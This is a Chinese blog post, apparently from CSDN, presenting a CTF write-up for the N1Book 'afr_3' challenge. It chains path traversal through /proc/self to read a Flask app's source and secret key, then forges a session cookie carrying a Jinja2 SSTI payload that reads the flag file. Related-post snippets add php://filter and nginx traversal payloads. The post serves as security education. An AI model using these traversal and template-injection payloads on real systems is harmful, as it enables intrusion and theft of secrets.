NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp

最新推荐文章于 2024-04-04 17:39:17 发布
最新推荐文章于 2024-04-04 17:39:17 发布
阅读量460 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118343734
版权

afr_3

考查内容:对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到

查看源代码,中间有个空格的

python server.py

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
     '''
     这里存在SSTI
     '''
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

发现flag在flag.py,flask的appkey在key.py,但是此处任意文件读取漏洞被过滤了关键词flag

源码里存在flask SSTI,前提是可以伪造flask的cookie,这里需要用到appkey https://noraj.github.io/flask-session-cookie-manager/

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/key.py获取appkey

  1. 伪造cookie为SSTI的payload获取flag.
{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}
居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
N1Book-第一章Web入门-任意文件读取漏洞-afr_3
weixin_40872714的博客
04-03 1215
N1Book-第一章Web入门-任意文件读取漏洞-afr_3 参考文章: https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787 http://elssm.top/2021/11/29/SSTI%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/ https://www.freebuf.com/articles/web/264088.html
NU1LCTFer成长-web入门-任意文件读取漏洞-afr_1-wp
居上
06-29 315
afr_1 payload http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag 这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag; BP base64解码得到flag ...
NU1LCTFer成长-web入门-任意文件读取漏洞-afr_2-wp
居上
06-29 238
afr_2 nginx配置错误 payload http://192.168.60.134/img../flag
NU1L-BOOK题目[第一章]
baidu_39504221的博客
11-24 699
文章目录[第一章 web入门]常见的搜集[第一章 web入门]粗心的小李[第一章 web入门]SQL注入-1[第一章 web入门]afr_1[第一章 web入门]afr_2[第一章 web入门]SQL注入-2 [第一章 web入门]常见的搜集 扫他后台 robots.txt index.php~ .index.php.swp [第一章 web入门]粗心的小李 直接使用书上推荐的工具scrabble 看他网站源码 [第一章 web入门]SQL注入-1 直接单引号报错,存在注入 查看字段 order
SSTI模板注入
weixin_42739903的博客
01-10 1422
SSTI 漏洞介绍和一些题目案例演示
3.国民技术N32G45X例程之-JTAG口复用GPIO.rar
12-23
复用过程涉及到对GPIO端口配置寄存器的操作,如AFR(Alternate Function Register)等,以设置相应的复用功能模式。 然而,描述中提到“原库函数有BUG”,这意味着在官方提供的例程或库函数中可能存在错误,导致...
ALM-Board-Manual-V1.9.zip_Air-fuel ratio_The Chip_cj125_oxygen s
07-14
ALM (Accurate Lambda Meter) is an air- fuel -ratio (AFR) meter which uses the Bosch LSU4.9 wideband oxygen sensor and Bosch semiconductor chip CJ125 to accurately measure the AFR or lambda for ...
ISO639-2.docx
06-16
例如,阿非利卡语(Afrikaans)的ISO 639-2代码是“afr”,而在ISO 639-1中,它的代码是“af”。这允许开发者在不同环境下灵活地识别和处理语言。 标准中还列出了多种语言,如阿非利坎语、阿瓦语、阿布哈兹语、阿伊...
afr-example-weather-station:该示例演示了使用Amazon FreeRTOS的IoT库实现气象站的实现
03-18
适用于PSoC 6 MCU的AWS IoT和FreeRTOS:气象站 本示例演示了使用PSoC:registered:6 MCU和ModusToolbox:registered:FreeRTOS SDK的AWS IoT Weather Station。该站点将使用MQTT协议连接到AWS IoT,并将天气更新发布到...
RomRaider-Assist:简单的页面可帮助您使用RomRaider创建地图。 目前是日志查看器
05-14
特征实施的: 导入CVS文件自动图形缩放AFR记录的单独图表RPM的右手y轴显示/隐藏日志数据Lambda <-> AFR转换气体,E85,E100,甲醇或柴油未执行日志分析和调优建议飞涨性能提升技术积分处理的处理的CVS文件解释
c+cgi+mysql+ajax实现web操作mysql
08-29
完成CGI - MYSQL作业: 实现一个MySQL Web 客户端。 通过浏览器操作MySQL。 页面整体布局如下: MySQL Host: (单行输入框) MySQL Port: (单行输入框) MySQL User: (单行输入框) MySQL Pass: (单行输入框) MySQL DB: (单行输入框) SQL 语句: (单行输入框) 总行数: XXXXX 表格显示SQL 结果。 要求: 输入对应的MYSQL SERVER 信息, 然后回显用户执行的 SQL 语句结果。 结果信息应包含: 总行数、 字段名,以及具体的字段内容。要求使用 AJAX,在不刷新整个页面的情况下,展示结果数据。 如果SQL语句执行出错,应给出具体的出错原因。 密码应用星号显示而非明文显示。
《从0到1:CTFer成长》配套题目第一章afr_3
Youth____的博客
12-14 2278
afr_3 这题跟着wp做的,让人头秃 本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 /proc/[pid],当查看当前进程的时候可以用/pro
[第一章 web入门]afr_3
最新发布
2202_75361164的博客
04-04 793
任意文件读取,session伪造+ssti。 可以发现secret_key在key.py,flag在flag.py里面 并且,/n1page由下面有ssti注入,注入的数据刚好是session
2020NU1LCTF两道pwn
abelxu
10-25 479
Signin 分析 new函数 只能对两个vector进行操作。每次new的数量超过限制时就会申请两倍的空间并把原来的空间释放 unk_2032A0和unk_2032C0的数据结构 struct Node{ void begin;#指向第一个元素,也是堆地址 void now;#指向当前元素 void end;#指向最后一个元素 } show函数 输出Node.now指向的元素 delete函数 并不会检测now指针是否小于begin。多次释放配合show可以泄露堆上的内容。 0x
N1BOOK第四关摸鱼:[第一章 web入门]afr_1
weixin_45571987的博客
12-02 2654
BUUCTF:[第一章 web入门]afr_1寻找考点构造解题payload解码base64编码得到flag关于php伪协议 寻找考点   由题目我们可以得知本题考点是php伪协议(其实知道是文件读取漏洞也不知道会用到php://filter的伪协议来读取源码的文件 构造解题payload   php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 下面我们构造url,下面是通用格式http://127.0.0.1/cmd.php?file=ph
N1BOOK第一关摸鱼:[第一章 web入门]常见的搜集
weixin_45571987的博客
11-29 4422
BUUCTF:[第一章 web入门]常见的搜集寻找有用的信息使用御剑(或者别的扫描径的软件也可以)通过一个个访问目录可以得到flagflag 寻找有用的信息   首先看了一下源码貌似没发现什么有价值的东西   然后顾名思义估计是要在站点的径中找到flag 使用御剑(或者别的扫描径的软件也可以)   可以得到以下三个径返回正常robots.txt index.php~ .index.php.swp   如果扫不出来(其实我就是没有扫出来的那一个。。)那就在字典里面添加新的径就可以扫出来了 大家也可
【N1BOOK】[第一章 web入门] wp
{OvEr}的博客
11-25 4151
【N1BOOK】[第一章 web入门]常见的搜集 wp 打开页面就是这样的 我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp 扫目录工具dirsearch/御剑,这里我用的是dirsearch。 我们一个个访问一下, 他说flag在/flag1_is_her3_fun.txt,那我们就访问一下 得到第一半flag,继续访问 index.php~ 得到第2半flag,继续访问 .index.php.swp,打开文件 发现第3半flag ..
N1BOOK第五关摸鱼:[第一章 web入门]afr_2
weixin_45571987的博客
12-02 2003
BUUCTF:[[第一章 web入门]afr_2打开页面,寻找解题线索查看目录并进行目录穿越查看img目录进行目录穿越拿到flag原理Nginx错误配置产生穿越漏洞 打开页面,寻找解题线索   页面里只有一个hello和一个gif图片,习惯性地打开源代码看看。   发现这边的gif图片在img文件夹中 查看目录并进行目录穿越 查看img目录   在url后面输入/img,成功查看img目录 进行目录穿越   在原来的url后面加上img../   然后我们就进入到了根目录下,在最下方有一个名为flag的
BUUCTF-N1BOOK-WP
weixin_42782443的博客
04-05 1306
BUUCTF-N1BOOK-WP[第一章 web入门]常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2afr_3[第二章 web进阶]SSRF Training死亡ping命令XSS闯关文件上传[第三章 web进阶][第四章 CTF之APK章][第五章 CTF之RE章][第六章 CTF之PWN章] [第一章 web入门] 常见的搜集 粗心的小李 SQL注入-1 SQL注入-2 afr_1 afr_2 afr_3 [第二章 web进阶] SSRF Training 死亡ping命令 XSS
阿尔法AFR-K3由器详细教程:配置与功能详解
本文档详细介绍了阿尔法AFR-K3因特网宽带由器的设置教程,该由器具有多项高级功能和特性,旨在为用户提供高速、稳定且安全的网络环境。 1. **性能与稳定性**: 阿尔法由器拥有高速稳定的运算能力,这意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值